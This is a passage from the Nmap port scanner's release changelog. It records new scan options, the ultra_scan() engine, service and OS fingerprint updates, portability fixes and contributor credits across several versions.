Improved algorithms make this faster (often dramatically so) in
almost all cases. Not only is it superior against single hosts, but
ultra_scan() can scan many hosts (sometimes hundreds) in parallel.
This offers many efficiency/speed advantages. For example, hosts
often limit the ICMP port unreachable packets used by UDP scans to
1/second. That made those scans extraordinarily slow in previous
versions of Nmap. But if you are scanning 100 hosts at once,
suddenly you can receive 100 responses per second. Spreading the
scan amongst hosts is also gentler toward the target hosts. Nmap
can still scan many ports at the same time, as well. If you find
cases where ultra_scan is slower or less accurate, please send a
report (including exact command-lines, versions used, and output, if
possible) to Fyodor.

o Added --max_hostgroup option which specifies the maximum number of
hosts that Nmap is allowed to scan in parallel.

o Added --min_hostgroup option which specifies the minimum number of
hosts that Nmap should scan in parallel (there are some exceptions
where Nmap will still scan smaller groups -- see man page). Of
course, Nmap will try to choose efficient values even if you don't
specify hostgroup restrictions explicitly.

o Rewrote TCP SYN, ACK, Window, and Connect() scans to use
ultra_scan() framework, rather than the old pos_scan().

o Rewrote FIN, Xmas, NULL, Maimon, UDP, and IP Protocol scans to use
ultra_scan(), rather than the old super_scan().

o Overhauled UDP scan. Ports that don't respond are now classified as
"open|filtered" (open or filtered) rather than "open". The (somewhat
rare) ports that actually respond with a UDP packet to the empty
probe are considered open. If version detection is requested, it
will be performed on open|filtered ports. Any that respond to any of
the UDP probes will have their status changed to open. This avoids a
the false-positive problem where filtered UDP ports appear to be
open, leading to terrified newbies thinking their machine is
infected by back orifice.

o Nmap now estimates completion times for almost all port scan types
(any that use ultra_scan()) as well as service scan (version
detection). These are only shown in verbose mode (-v). On scans
that take more than a minute or two, you will see occasional updates
like:
SYN Stealth Scan Timing: About 30.01% done; ETC: 16:04 (0:01:09 remaining)
New updates are given if the estimates change significantly.

o Added --exclude option, which lets you specify a comma-separated
list of targets (hosts, ranges, netblocks) that should be excluded
from the scan. This is useful to keep from scannig yourself, your
ISP, particularly sensitive hosts, etc. The new --excludefile reads
the list (newline-delimited) from a given file. All the work was
done by Mark-David McLaughlin (mdmcl(a)cisco.com> and William McVey
( wam(a)cisco.com ), who sent me a well-designed and well-tested
patch.

o Nmap now has a "port scan ping" system. If it has received at least
one response from any port on the host, but has not received
responses lately (usually due to filtering), Nmap will "ping" that
known-good port occasionally to detect latency, packet drop rate,
etc.

o Service/version detection now handles multiple hosts at once for
more efficient and less-intrusive operation.

o Nmap now wishes itself a happy birthday when run on September 1 in
verbose mode! The first public release was on that date in 1997.

o The port randomizer now has a bias toward putting
commonly-accessible ports (80, 22, etc.) near the beginning of the
list. Getting a response early helps Nmap calculate response times and
detect packet loss, so the scan goes faster.

o Host timeout system (--host_timeout) overhauled to support host
parallelization. Hosts times are tracked separately, so a host that
finishes a SYN scan quickly is not penalized for an exceptionally
slow host being scanned at the same time.

o When Nmap has not received any responses from a host, it can now
use certain timing values from other hosts from the same scan
group. This way Nmap doesn't have to use absolute-worst-case
(300bps SLIP link to Uzbekistan) round trip timeouts and such.

o Enabled MAC address reporting when using the Windows version
of Nmap. Thanks to Andy Lutomirski (luto(a)stanford.edu) for
writing and sending the patch.

o Workaround crippled raw sockets on Microsoft Windows XP SP2 scans.
I applied a patch by Andy Lutomirski (luto(a)stanford.edu) which
causes Nmap to default to winpcap sends instead. The winpcap send
functionality was already there for versions of Windows such as NT and
Win98 that never supported Raw Sockets in the first place.

o Changed how Nmap sends Arp requests on Windows to use the iphlpapi
SendARP() function rather than creating it raw and reading the
response from the Windows ARP cache. This works around a
(reasonable) feature of Windows Firewall which ignored such
unsolicited responses. The firewall is turned on by default as of
Windows XP SP2. This change was implemented by Dana Epp
(dana(a)vulscan.com).

o Fixed some Windows portability issues discovered by Gisle Vanem
(giva(a)bgnett.no).

o Upgraded libpcap from version 0.7.2 to 0.8.3. This was an attempt
to fix an annoying bug, which I then found was actually in my code
rather than libpcap :).

o Removed Ident scan (-I). It was rarely useful, and the
implementation would have to be rewritten for the new ultra_scan()
system. If there is significant demand, perhaps I'll put it back in
sometime.

o Documented the --osscan_limit option, which saves time by skipping
OS detection if at least one open and one closed port are not found on
the remote hosts. OS detection is much less reliable against such
hosts anyway, and skipping it can save some time.

o Updated nmapfe.desktop file to provide better NmapFE desktop support
under Fedora Core and other systems. Thanks to Mephisto
(mephisto(a)mephisto.ma.cx) for sending the patch.

o Further nmapfe.desktop changes to better fit the freedesktop
standard. The patch came from Murphy (m3rf(a)swimmingnoodle.com).

o Fixed capitalization (with a perl script) of many over-capitalized
vendor names in nmap-mac-prefixes.

o Ensured that MAC address vendor names are always escaped in XML
output if they contain illegal characters (particularly '&'). Thanks
to Matthieu Verbert (mve(a)zurich.ibm.com) for the report and a patch.

o Changed xmloutputversion in XML output from 1.0 to 1.01 to note that
there was a slight change (which was actually the MAC stuff in 3.55).
Thanks to Lionel CONS (lionel.cons(a)cern.ch) for the suggestion.

o Many Windows portability fix and bug fixes, thanks to patch from
Gisle Vanem (giva(a)bgnett.no). With these changes, he was able to
compile Nmap on Windows using MingW + gcc 3.4 C++ rather than MS
Visual Studio.

o Removed (addport) tags from XML output. They used to provide open
ports as they were discovered, but don't work now that the port
scanners scan many hosts at once. They did not specify an IP
address. Of course the appropriate (port) tags are still printed
once scanning of a target is complete.

o Configure script now detects GNU/k*BSD systems (whatever those are),
thanks to patch from Robert Millan (rmh@debian.org)

o Fixed various crashes and assertion failures related to the new
ultra_scan() system, that were found by Arturo "Buanzo" Busleiman
(buanzo(a)buanzo.com.ar), Eric (catastrophe.net), and Bill Petersen
(bill.petersen(a)alcatel.com).

o Fixed some minor memory leaks relating to ping and list scanning as
well as the Nmap output table. These were found with valgrind (
http://valgrind.kde.org/ ).

o Provide limited --packet_trace support for TCP connect() (-sT)
scans.

o Fixed compilation on certain Solaris machines thanks to a patch by
Tom Duffy (tduffy(a)sun.com)

o Fixed some warnings that crop up when compiling nbase C files with a
C++ compiler. Thanks to Gisle Vanem (giva(a)bgnett.no) for sending
the patch.

o Tweaked the License blurb on source files and in the man page. It
clarifies some issues and includes a new GPL exception that
explicitly allows linking with the OpenSSL library. Some people
believe that the GPL and OpenSSL licenses are incompatable without
this special exception.

o Fixed some serious runtime portability issues on *BSD systems.
Thanks to Eric (catastrophe.net) for reporting the problem.

o Changed the argument parser to better detect bogus arguments to the
-iR option.

o Removed a spurious warning message relating to the Windows ARP cache
being empty. Patch by Gisle Vanem (giva(a)bgnett.no).

o Removed some C++-style line comments (//) from nbase, because some C
compilers (particularly on Solaris) barf on those. Problem reported
by Raju Alluri

Nmap 3.55

o Added MAC address printing. If Nmap receives packet from a target
machine which is on an Ethernet segment directly connected to the
scanning machine, Nmap will print out the target MAC address. Nmap
also now contains a database (derived from the official IEEE
version) which it uses to determine the vendor name of the target
ethernet interface. The Windows version of Nmap does not yet have
this capability. If any Windows developer types are interesting in
adding it, you just need to implement IPisDirectlyConnected() in
tcpip.cc and then please send me the patch. Here are examples from
normal and XML output (angle brackets replaced with [] for HTML
changelog compatibility):
MAC Address: 08:00:20:8F:6B:2F (SUN Microsystems)
[address addr="00:A0:CC:63:85:4B" vendor="Lite-on Communications" addrtype="mac" /]

o Updated the XML DTD to support the newly printed MAC addresses.
Thanks to Thorsten Holz (thorsten.holz(a)mmweg.rwth-aachen.de) for
sending this patch.

o Added a bunch of new and fixed service fingerprints for version
detection. These are from Martin MaÃ¨ok
(martin.macok(a)underground.cz).

o Normalized many of the OS names in nmap-os-fingerprints (fixed
capitalization, typos, etc.). Thanks to Royce Williams
(royce(a)alaska.net) and Ping Huang (pshuang(a)alum.mit.edu) for
sending patches.

o Modified the mswine32/nmap_performance.reg Windows registry file to
use an older and more compatible version. It also now includes the
value "StrictTimeWaitSeqCheck"=dword:00000001 , as suggested by Jim
Harrison (jmharr(a)microsoft.com). Without that latter value, the
TcpTimedWaitDelay value apparently isn't checked. Windows users
should apply the new registry changes by clicking on the .reg file.
Or do it manually as described in README-WIN32. This file is also
now available in the data directory at
http://www.insecure.org/nmap/data/nmap_performance.reg

o Applied patch from Gisle Vanem (giva(a)bgnett.no) which allows the
Windows version of Nmap to work with WinPCAP 3.1BETA (and probably
future releases). The Winpcap folks apparently changed the encoding
of adapter names in this release.

o Fixed a ping scanning bug that would cause this error message: "nmap:
targets.cc:196: int hostupdate (Target **, Target *, int, int, int,
timeout_info *, timeval *, timeval *, pingtune *, tcpqueryinfo *,
pingstyle): Assertion `pt->down_this_block > 0' failed." Thanks to
Beirne Konarski (beirne(a)neo.rr.com) for reporting the problem.

o If a user attempts -PO (the letter O), print an error suggesting
that they probably mean -P0 (Zero) to disable ping scanning.

o Applied a couple patches (with minor changes) from Oliver Eikemeier
(eikemeier(a)fillmore-labs.com) which fix an edge case relating to
decoy scanning IP ranges that must be sent through different
interfaces, and improves the Nmap response to certain error codes
returned by the FreeBSD firewall system. The patches are from
http://cvsweb.freebsd.org/ports/security/nmap/files/ .

o Many people have reported this error: "checking for type of 6th
argument to recvfrom()... configure: error: Cannot find type for 6th
argument to recvfrom()". In most cases, the cause was a missing or
broken C++ compiler. That should now be detected earlier with a
clearer message.

o Fixed the FTP bounce scan to better detect filtered ports on the
target network.

o Fixed some minor bugs related to the new MAC address printing
feature.

o Fixed a problem with UDP-scanning port 0, which was reported by
Sebastian Wolfgarten (sebastian(a)wolfgarten.com).

o Applied patch from Ruediger Rissmann (RRI(a)zurich.ibm.com), which
helps Nmap understand an EACCESS error, which can happen at least
during IPv6 scans from certain platforms to some firewalled targets.

o Renamed ACK ping scan option from -PT to -PA in the documentation.
Nmap has accepted both names for years and will continue to do
so.

o Removed the notice that Nmap is reading target specifications from a
file or stdin when you specify the -iL option. It was sometimes
printed to stdout even when you wanted to redirect XML or grepable
output there, because it was printed during options processing before
output files were handled. This change was suggested by Anders Thulin
(ath(a)algonet.se).

o Added --source_port as a longer, but hopefully easier to remember,
alias for -g. In other words, it tries to use the constant source
port number you specify for probes. This can help against poorly
configured firewalls that trust source port 20, 53, and the like.

o Removed undocumented (and useless) -N option.

o Fixed a version detection crash reported in excellent detail by
Jedi/Sector One (j(a)pureftpd.org).

o Applied patch from Matt Selsky (selsky(a)columbia.edu) which helps
Nmap build with OpenSSL.

o Modified the configure/build system to fix library ordering problems
that prevented Nmap from building on certain platforms. Thanks to
Greg A. Woods (woods(a)weird.com) and Saravanan
(saravanan_kovai(a)HotPop.com) for the suggestions.

o Applied a patch to Makefile.in from Scott Mansfield
(thephantom(a)mac.com) which enables the use of a DESTDIR variable
to install the whole Nmap directory structure under a different root
directory. The configure --prefix option would do the same thing in
this case, but DESTDIR is apparently a standard that package
maintainers like Scott are used to. An example usage is
"make DESTDIR=/tmp/packageroot".

o Removed unnecessary banner printing in the non-root connect() ping
scan. Thanks to Tom Rune Flo (tom(a)x86.no) for the suggestion and
a patch.

o Updated the headers at the top of each source file (mostly to
advance the copyright year to 2004 and note that Nmap is a registered
trademark).

o The SInfo line of submitted fingerprints now provides the target's
OUI (first three bytes of the MAC address) if available. Example:
"M=00A0CC". To save a couple bytes, the "Time" field in SInfo has
been renamed to "Tm". The OUI helps identify the device vendor, and
is only available when the source and target machines are on the
same ethernet network.

Nmap 3.50

o Integrated a ton of service fingerprints, increasing the number of
signatures more than 50%. It has now exceeded 1,000 for the first
time, and represents 180 unique service protocols from acap, afp,
and aim to xml-rpc, zebedee, and zebra.

o Implemented a huge OS fingerprint update. The number of
fingerprints has increased more than 13% to 1,121. This is the first
time it has exceeded 1000. Notable updates include Linux 2.6.0, Mac
OS X up to 10.3.2 (Panther), OpenBSD 3.4 (normal and pf "scrub all"),
FreeBSD 5.2, the latest Windows Longhorn warez, and Cisco PIX 6.3.3.
As usual, there are a ton of new consumer devices from ubiquitous
D-Link, Linksys, and Netgear broadband routers to a number of new IP
phones including the Cisco devices commonly used by Vonage. Linksys
has apparently gone special-purpose with some of their devices, such
as their WGA54G "Wireless Game Adapter" and WPS54GU2 wireless print
server. A cute little MP3 player called the Rio Karma was submitted
multiple times and I also received and integrated fingerprints for the
Handspring Treo 600 (PalmOS).

o Applied some man page fixes from Eric S. Raymond
(esr(a)snark.thyrsus.com).

o Added version scan information to grepable output between the last
two '/' delimiters (that space was previously unused). So the format
is now "portnum/state/protocol/owner/servicename/rpcinfo/versioninfo"
as in "53/open/tcp//domain//ISC Bind 9.2.1/" and
"22/open/tcp//ssh//OpenSSH 3.5p1 (protocol 1.99)/". Thanks to
MadHat (madhat(a)unspecific.com) for sending a patch (although I did
it differently). Note that any '/' characters in the
version (or owner) field are replaced with '|' to keep awk/cut
parsing simple. The service name field has been updated so that it
is the same as in normal output (except for the same sort of
escaping discussed above).

o Integrated an Oracle TNS service probe and match lines contributed
by Frank Berger (fm.berger(a)gmx.de). New probe contributions are
always appreciated!

o Fixed a crash that could happen during SSL version detection due to
SSL session ID cache reference counting issues.

o Applied patch from Rob Foehl (rwf(a)loonybin.net) which fixes the
--with_openssl=DIR configure argument.

o Applied patch to nmap XML dtd (nmap.dtd) from Mario Manno
(mm(a)koeln.ccc.de). This accounts for the new version scanning
functionality.

o Updated the Windows build system so that you don't have to manually
copy nmap-service-probes to the output directory. I also updated
the README-WIN32 to elaborate further on the build process.

o Added configure option --with-libpcre=included which causes Nmap to
build with its included version of libpcre even if an acceptable
version is available on the system.

o Upgraded to Autoconf 2.59 (from 2.57). This should help HP-UX
compilation problems reported by Petter Reinholdtsen
(pere(a)hungry.com) and may have other benefits as well.

o Applied patch from Przemek Galczewski (sako(a)avet.com.pl) which
adds spaces to the XML output in places that apparently help certain
older XML parsers.

o Made Ident-scan (-I) limits on the length and type of responses
stricter so that rogue servers can't flood your screen with 1024
characters. The new length limit is 32. Thanks to Tom Rune Flo
(tom(a)x86.no) for the suggestion and a patch.

o Fingerprints for unrecognized services can now be a bit longer to
avoid truncating as much useful response information. While the
fingerprints can be longer now, I hope they will be less frequent
because of all the newly recognized services in this version.

o The nmap-service-probes "match" directive can now take a service
name like "ssl/vmware-auth". The service will then be reported as
vmware-auth (or whatever follows "ssl/") tunneled by SSL, yet Nmap
won't actually bother initiating an SSL connection. This is useful
for SSL services which can be fully recognized without the overhead
of making an SSL connection.

o Version scan now chops commas and whitespace from the end of
vendorproductname, version, and info fields. This makes it easier to
write templates incorporating lists. For example, the tcpmux service
(TCP port 1) gives a list of supported services separated by CRLF.
Nmap uses this new feature to print them comma separated without
having an annoying trailing comma as so (linewrapped):
match tcpmux m|^(sgi_[-.\w]+\r\n([-.\w]+\r\n)*)$|
v/SGI IRIX tcpmux//Available services: $SUBST(1, "\r\n", ",")/

Nmap 3.48

o Integrated an enormous number of version detection service
submissions. The database has almost doubled in size to 663
signatures representing the following 130 services:
3dm-http afp apcnisd arkstats bittorent chargen citrix-ica
cvspserver cvsup dantzretrospect daytime dict directconnect domain
echo eggdrop exec finger flexlm font-service ftp ftp-proxy gnats
gnutella-http hddtemp hp-gsg http http-proxy hylafax icecast ident
imap imaps imsp ipp irc ircbot irc-proxy issrealsecure jabber
kazaa-http kerberos-sec landesk-rc ldap linuxconf lmtp lotusnotes
lpd lucent-fwadm meetingmaker melange microsoft-ds microsoft-rdp
mldonkey msactivesync msdtc msrpc ms-sql-m mstask mud mysql
napster ncacn_http ncp netbios-ns netbios-ssn netrek netsaint
netstat netwareip networkaudio nntp nsclient nsunicast ntop-http
omniback oracle-mts oracle-tns pcanywheredata pksd pmud pop2 pop3
pop3s poppass postgresql powerchute printer qotd redcarpet
rendezvous rlogind rpc rsync rtsp sdmsvc sftp shell shivahose
sieve slimp3 smtp smux snpp sourceoffice spamd ssc-agent ssh ssl
svrloc symantec-av symantec-esm systat telnet time tinyfw upnp
uucp veritasnetbackup vnc vnc-http vtun webster whois wins
winshell wms X11 xfce zebra

o Added the ability to execute "helper functions" in version
templates, to help clean up/manipulate data captured from a server
response. The first defined function is P() which includes only
printable characters in a captured string. The main impetus for
this is to deal with Unicode strings like
"W\0O\0R\0K\0G\0R\0O\0U\0P\0" that many MS protocols send. Nmap can
now decode that into "WORKGROUP".

o Added SUBST() helper function, which replaces strings in matched
appname/version/extrainfo strings with something else. For example,
VanDyke Vshell gives a banner that includes
"SSH-2\.0-VShell_2_2_0_528". A substring match is used to pick out
the string "2_2_0_528", and then SUB21ST(1,"_",".") is called on that
match to form the version number 2.2.0.528.

o If responses to a probe fail to match any of the registered match
strings for that probe, Nmap will now try against the registered "null
probe" match strings. This helps in the case that the NULL probe
initially times out (perhaps because of initial DNS lookup) but the
banner appears in later responses.

o Applied some portability fixes (particularly for OpenBSD) from Chad
Loder (cloder(a)loder.us), who is also now the OpenBSD Nmap port
maintainer.

o Applied some portability fixes from Marius Strobl
(marius(a)alchemy.franken.de).

o The tarball distribution of Nmap now strips the binary at install
time thanks to a patch from Marius Strobl
(marius(a)alchemy.franken.de).

o Fixed a problem related to building Nmap on systems that lack PCRE
libs (and thus have to use the ones included by Nmap). Thanks to Remi
Denis-Courmont (deniscr6(a)cti.ecp.fr) for the report and patch.

o Alphabetized the service names in each Probe section in
nmap-service-probes (makes them easier to find and add to).

o Fixed the problem several people reported where Nmap would quit with
a "broken pipe" error during service scanning. Thanks to Jari Ruusu
(jari.ruusu(a)pp.inet.fi) for sending a patch. The actual error
message was "Unexpected error in NSE_TYPE_READ callback. Error
code: 32 (Broken pipe)"

o Fixed protocol scan (-sO), which I had broken when adding the new
output table format. It would complain "NmapOutputTable.cc:128:
failed assertion `row < numRows'". Thanks to Matt Burnett
(marukka(a)mac.com) for notifying me of the problem.

o Upgraded Libpcap to the latest tcpdump.org version (0.7.2) from
0.7.1

o Applied a patch from Peter Marschall (peter(a)adpm.de) which adds
version detection support to nmapfe.

o Fixed a problem with XML output being invalid when service detection
was done on SSL-tunneled ports. Thanks to the several people who
reported this - it means that folks are actually using the XML
output :).

o Fixed (I hope) some Solaris Sun ONE compiler compilation problems
reported (w/patches) by Mikael Mannstrom (candyman(a)penti.org)

o Fixed the --with-openssl configure option for people who have
OpenSSL installed in a path not automatically found by their
compilers. Thanks to Marius Strobl (marius(a)alchemy.franken.de) for
the patch.

o Made some portability changes for HP-UX and possibly other types of
machines, thanks to a patch from Petter Reinholdtsen (pere(a)hungry.com)

o Applied a patch from Matt Selsky (selsky(a)columbia.edu) which fixes
compilation on some Solaris boxes, and maybe others. The error said
"cannot compute sizeof (char)"

o Applied some patches from the NetBSD ports tree that Hubert Feyrer
(hubert.feyrer(a)informatik.fh-regensburg.de) sent me. The NetBSD
Nmap ports page is at http://www.NetBSD.org/packages/net/nmap/ .

o Applied some Makefile patches from the FreeBSD ports tree that I
found at http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/nmap/files/

Nmap 3.45

o Integrated more service signatures from MadHat
(madhat(a)unspecific.com), Brian Hatch (bri(a)ifokr.org), Niels
Heinen (zillion(a)safemode.org), Solar Designer
(solar(a)openwall.com), Seth Master
(smaster(a)stanford.edu), and Curt Wilson
(netw3_security(a)hushmail.com). We now have 378 signatures
recognizing 86 unique service protocols.

o Added new HTTPOptions and RTSPRequest probes suggested by MadHat
(madhat(a)unspecific.com)

o Changed the .spec file to compile Nmap RPMs without SSL support to
improve compatibility (Some users might not have OpenSSL, and even
those who do might not have the right version (libopenssl.so.2 vs
libopenssl.so.4, etc).

o Applied a patch from Solar Eclipse (solareclipse(a)phreedom.org)
which increases the allowed size of the 'extrainfo' version field from
80 characters to 128. The main benefit is to allow longer apache module
version strings.

o Fixed Windows compilation and improved the Windows port slightly (no
more macro to redefine read().

o Applied some updates to README-WIN32 sent in by Kirby Kuehl
(kkuehl(a)cisco.com). He improved the list of suggested registry
changes and also fixed a typo or two. He also attached a .reg file
automate the Nmap connect() scan performance enhancing registry
changes. I am now including that with the Nmap Windows binary .zip
distribution (and in mswin32/ of the source distro).

o Applied a one-line patch from Dmitry V. Levin (ldv(a)altlinux.org)
which fixes a test Nmap does during compilation to see if an existing
libpcap installation is recent enough.

Nmap 3.40PVT17

o Wrote and posted a new paper on version scanning to
http://www.insecure.org/nmap/versionscan.html . Updated
nmap-service-probes and the Nmap man page to simply refer to this
URL.

o Integrated more service signatures from my own scanning as well as
contributions from Brian Hatch (bri(a)ifokr.org), MadHat
(madhat(a)unspecific.com), Max Vision (vision(a)whitehats.com), HD
Moore (hdm(a)digitaloffense.net), Seth Master
(smaster(a)stanford.edu), and Niels Heinen (zillion(a)safemode.org).
MadHat also contributed a new probe for Windows Media Service. Many
people set a LOT of signatures, which has allowed
nmap-service-probes to grow from 295 to 356 signatures representing
85 service protocols!

o Applied a patch (with slight changes) from Brian Hatch
(bri(a)ifokr.org) which enables caching of SSL sessions so that
negotiation doesn't have to be repeated when Nmap reconnects to the same
between probes.

o Applied a patch from Brian Hatch (bri(a)ifokr.org) which optimizes the
requested SSL ciphers for speed rather than security. The list was
based on empirical evidence from substantial benchmarking he did with
tests that resemble nmap-service-scanning.

o Updated the Nmap man page to discuss the new version scanning
options (-sV, -A).

o I now include nmap-version/aclocal.m4 in the distribution as this is
required to rebuild the configure script ( thanks to Dmitry V. Levin
(ldv(a)altlinux.org) for notifying me of the problem.

o Applied a patch from Dmitry V. Levin (ldv(a)altlinux.org) which
detects whether the PCRE include file is or
o Applied a patch from Dmitry V. Levin (ldv(a)altlinux.org) which
fixes typos in some error messages. The patch apparently came from
the highly-secure and stable Owl and Alt Linux distributions. Check
them out at http://www.openwall.com/Owl/ and
http://www.altlinux.com/

o Fixed compilation on Mac OS X - thanks to Brian Hatch
(bri(a)ifokr.org> and Ryan Lowe (rlowe(a)pablowe.net) for giving me
access to Mac OS X boxes.

o Stripped down libpcre build system to remove libtool dependency and
other cruft that Nmap doesn't need. (this was mostly a response to
libtool-related issues on Mac OS X).

o Added a new --version_trace option which causes Nmap to print out extensive
debugging info about what version scanning is doing (this is a subset
of what you would get with --packet_trace). You should usually use
this in combination with at least one -d option.

o Fixed a port number printing bug that would cause Nmap service
fingerprints to give a negative port number when the actual port was
above 32K. Thanks to Seth Master (smaster(a)stanford.edu) for finding
this.

o Updated all the header text again to clarify our interpretation of
"derived works" after some suggestions from Brian Hatch
(bri(a)ifokr.org)

o Updated the Nsock config.sub/config.guess to the same newer versions
that Nmap uses (for Mac OS X compilation).

Nmap 3.40PVT16

o Fixed a compilation problem on systems w/o OpenSSL that was
discovered by Solar Designer. I also fixed some compilation
problems on non-IPv6 systems. It now compiles and runs on my
Solaris and ancient OpenBSD systems.

o Integrated more services thanks to submissions from Niels Heinen
(zillion(a)safemode.org).

o Canonicalized the headers at the top of each Nmap/Nsock header source
file. This included clarifying our interpretation of derived works,
updating the copyright date to 2003, making the header a bit wider,
and a few other light changes. I've been putting this off for a
while, because it required editing about a hundred !#$# files!

Nmap 3.40PVT15

o Fixed a major bug in the Nsock time caching system. This could
cause service detection to inexplicably fail against certain ports in
the second or later machines scanned. Thanks to Solar Designer and HD
Moore for helping me track this down.

o Fixed some *BSD compilation bugs found by
Zillion (zillion(a)safemode.org).

o Integrated more services thanks to submissions from Fyodor Yarochkin
(fygrave(a)tigerteam.net), and Niels Heinen
(zillion(a)safemode.org), and some of my own exploring. There are
now 295 signatures.

o Fixed a compilation bug found by Solar Designer on machines that
don't have struct sockaddr_storage. Nsock now just uses "struct
sockaddr *" like connect() does.

o Fixed a bug found by Solar Designer which would cause the Nmap
portscan table to be truncated in -oN output files if the results are
very long.

o Changed a bunch of large stack arrays (e.g. int portlookup[65536])
into dynamically allocated heap pointers. The large stack variables
apparently caused problems on some architectures. This issue was
reported by osamah abuoun (osamah_abuoun(a)hotmail.com).

Nmap 3.40PVT14

o Added IPv6 support for service scan.

o Added an 'sslports' directive to nmap-service-probes. This tells
Nmap which service checks to try first for SSL-wrapped ports. The
syntax is the same as the normal 'ports' directive for non-ssl ports.
For example, the HTTP probe has an 'sslports 443' line and
SMTP-detecting probes have and 'sslports 465' line.

o Integrated more services thanks to submissions from MadHat
(madhat(a)unspecific.com), Solar Designer (solar(a)openwall.com), Dug
Song (dugsong(a)monkey.org), pope(a)undersec.com, and Brian Hatch
(bri(a)ifokr.org). There are now 288 signatures, matching these 65
service protocols:
chargen cvspserver daytime domain echo exec finger font-service
ftp ftp-proxy http http-proxy hylafax ident ident imap imaps ipp
ircbot ircd irc-proxy issrealsecure landesk-rc ldap meetingmaker
microsoft-ds msrpc mud mysql ncacn_http ncp netbios-ns netbios-ssn
netsaint netwareip nntp nsclient oracle-tns pcanywheredata pop3
pop3s postgres printer qotd redcarpet rlogind rpc rsync rtsp shell
smtp snpp spamd ssc-agent ssh ssl telnet time upnp uucp vnc
vnc-http webster whois winshell X11

o Added a Lotus Notes probe from Fyodor Yarochkin
(fygrave(a)tigerteam.net).

o Dug Song wins the "award" for most obscure service fingerprint
submission. Nmap now detects Dave Curry's Webster dictionary server
from 1986 :).

o Service fingerprints now include a 'T=SSL' attribute when SSL
tunneling was used.

o More portability enhancements thanks to Solar Designer and his Linux
2.0 libc5 boxes.

o Applied a patch from Gisle Vanem (giva(a)bgnett.no) which improves
Windows emulation of the UNIX mmap() and munmap() memory mapping calls.

Nmap 3.40PVT13

o Added SSL-scan-through support. If service detection finds a port to be
SSL, it will transparently connect to the port using OpenSSL and use
version detection to determine what service lies beneath. This
feature is only enabled if OpenSSL is available at build time. A
new --with-openssl=DIR configure option is available if OpenSSL is
not in your default compiler paths. You can use --without-openssl
to disable this functionality. Thanks to Brian Hatch
(bri(a)ifokr.org) for sample code and other assistance. Make sure
you use a version without known exploitable overflows. In
particular, versions up to and including OpenSSL 0.9.6d and
0.9.7-beta2 contained serious vulnerabilities described at
http://www.openssl.org/news/secadv_20020730.txt . Note that these
vulnerabilities are well over a year old at the time of this
writing.

o Integrated many more services thanks to submissions from Brian
Hatch, HellNBack ( hellnbak(a)nmrc.org ), MadHat, Solar Designer,
Simple Nomad, and Shawn Wallis (swallis(a)ku.edu). The number of
signatures has grown from 242 to 271. Thanks!

o Integrated Novell Netware NCP and MS Terminal Server probes from
Simple Nomad (thegnome(a)nmrc.org).

o Fixed a segfault found by Solar Designer that could occur when
scanning certain "evil" services.

o Fixed a problem reported by Solar Designer and MadHat (
madhat(a)unspecific.com ) where Nmap would bail when certain Apache
version/info responses were particularly long. It could happen in
other cases as well. Now Nmap just prints a warning.

o Fixed some portability issues reported by Solar Designer
( solar(a)openwall.com )

Nmap 3.40PVT12

o I added probes for SSL (session startup request) and microsoft-ds
(SMB Negotiate Protocol request).

o I changed the default read timeout for a service probe from 7.5s to 5s.

o Fixed a one-character bug that broke many scans when -sV was NOT
given. Thanks to Blue Boar (BlueBoar(a)thievco.com) for the report.

Nmap 3.40PVT11

o Integrated many more services thanks to submissions from Simple
Nomad, Solar Designer, jerickson(a)inphonic.com, Curt Wilson, and
Marco Ivaldi. Thanks! The match line count has risen from 201 to 242.

o Implemented a service classification scheme to separate the
vendor/product name from the version number and any extra info that
is provided. Instead of v/[big version string]/, the new match
lines include v/[vendor/productname]/[version]/[extrainfo]/ . See
the docs at the top of nmap-service-probes for more info. This
doesn't change the normal output (which lumps them together anyway),
but they are separate in the XML so that higher-level programs can
easily match against just a product name. Here are a few examples
of the improved service element:
extrainfo="protocol 1.99" method="probed" conf="10" />
method="probed" conf="10" />
extrainfo="rpc #100000" method="probed" conf="10" />

o I went through nmap-service-probes and added the vendor name to more
entries. I also added the service name where the product name
itself didn't make that completely obvious.

o SCO Corporation of Lindon, Utah (formerly Caldera) has lately taken
to an extortion campaign of demanding license fees from Linux users
for code that they themselves knowingly distributed under the terms
of the GNU GPL. They have also refused to accept the GPL, claiming
that some preposterous theory of theirs makes it invalid. Meanwhile
they have distributed GPL-licensed Nmap in (at least) their
"Supplemental Open Source CD". In response to these blatant
violations, and in accordance with section 4 of the GPL, we hereby
terminate SCO's rights to redistribute any versions of Nmap in any
of their products, including (without limitation) OpenLinux,
Skunkware, OpenServer, and UNIXWare.

Nmap 3.40PVT10

o Added "soft matches". These are similar to normal match lines in
that they provide a regex for recognizing a service (but no version).
But instead of stopping at softmatch service recognition, the scan
continues looking for more info. It only launches probes that are
known-capable of matching the softmatched service. If no version
number is found, at least the determined service is printed. A
service print for submission is also provided in that case. So this
provides more informative results and improves efficiency.

o Cleaned up the Windows support a bit and did more testing and
fixing. Windows service detection seems to be working fine for me
now, although my testing is still pretty limited. This release
includes a Windows binary distribution and the README-WIN32 has been
updated to reflect new compilation instructions.

o More service fingerprints! Thanks to Solar Designer, Max Vision,
Frank Denis (Jedi/Sector One) for the submissions. I also added a
bunch from my own testing. The number of match lines went from 179
to 201.

o Updated XML output to handle new version and service detection
information. Here are a few examples of the new output:
name="ssh" version="OpenSSH 3.1p1 (protocol 1.99)" method="probed"
conf="10" />
name="rpcbind" version="2 (rpc #100000)" method="probed" conf="10" />
name="rndc" method="table" conf="3" />

o Fixed issue where Nmap would quit when ECONNREFUSED was returned
when we try to read from an already-connected TCP socket. FreeBSD
does this for some reason instead of giving ECONNRESET. Thanks to
Will Saxon (WillS(a)housing.ufl.edu) for the report.

o Removed the SERVICEMATCH_STATIC match type from
nmap-service-probes. There wasn't much benefit of this over regular
expressions, so it isn't worth maintaining the extra code.

Nmap 3.40PVT9

o Added/fixed numerous service fingerprints thanks to submissions from
Max Vision, MadHat, Seth Master. Match lines went
from 164 to 179.

o The Winpcap libraries used in the Windows build process have been
upgraded to version 3.0.

o Most of the Windows port is complete. It compiles and service scan
works (I didn't test very deeply) on my WinXP box with VS.Net 2003.
I try to work out remaining kinks and do some cleanup for the next
version. The Windows code was restructured and improved quite a bit,
but much more work remains to be done in that area. I'll probably
do a Windows binary .zip release of the next version.

o Various minor fixes

Nmap 3.40PVT8

o Service scan is now OFF by default. You can activate it with -sV.
Or use the snazzy new -A (for "All recommended features" or
"Aggressive") option which turns on both OS detection and service
detection.

o Fixed compilation on my ancient OpenBSD 2.3 machine (a Pentium 60 :)

